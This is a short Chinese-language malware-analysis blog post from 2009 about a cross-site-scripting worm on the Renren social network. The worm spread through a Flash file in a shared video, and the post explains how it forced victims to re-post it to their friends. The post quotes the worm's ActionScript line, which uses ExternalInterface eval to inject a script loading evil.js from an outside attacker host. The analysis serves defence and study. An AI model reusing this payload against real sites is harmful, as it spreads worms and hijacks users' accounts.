Blast's Security Lab
Malive: 人人网跨站脚本中的swf
发布:blast26 Aug 2009
目标: 跨站脚本中的swf
版本: -
来源: hxxp://n.99081.com/xnxss1/evil.js
工具: Redoce 2.036
语言: JavaScript / SWF ActionScript
SAC#09006
www.sacour.cn 转载保留此行
这个就是之前说的那个人人网分享视频的那个蠕虫,代码里面能看出他执行时会试图添加一个副本evil.js,这个js跟图中这个renren.js一样,为了使打开收到信息的人再次中奖被强制发送信息给好友。
检查一下这个swf的actionscript:var fun = "var x=document.createElement(\"SCRIPT\");x.src=\"http://n.99081.com/xnxss1/evil.js\"; x.defer=true;document.getElementsByTagName(\"HEAD\")[0].appendChild(x);";
flash.external.ExternalInterface.call("eval", fun);
好吧这家伙还是试图加载那个js,不过总不能加载完就没事了吧,主框架的脚本还有:
loadMovie("http://www.tudou.com/player/outside/player_outside.swf?iid=4120048&default_skin=http://js.tudouui.com/bin/player2/outside/Skin_outside_13.swf&autostart=false&rurl=", this);
加载一个土豆网的视频,难怪了,那个视频点击量已经接近800,000次,不过下边的评论里面围观群众人数也不少……
没了?没了。所以这东西一开头也就说:
// I'm not a malicious worm.^^;
既然这样,只能……好吧,你说的对……
Tags: Malive 分析
- Malive: 解密.class文件 (2009-8-25 17:56:5)
- Ordovanda!8.22-8.24报告 (2009-8-25 13:3:30)
- Malive : SPAM - Business Proposal (2009-8-23 18:32:24)
- Malive: A*V下载?小噱头,大阴谋 (2009-8-23 14:20:3)
- Malive: weiwei520.vip.sina.com+cc.exe的分析 (2009-8-21 22:28:0)
- Ordovanda!8.19-8.21报告 (2009-8-21 19:11:14)
相关文章:
- 订阅本站 (RSS)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。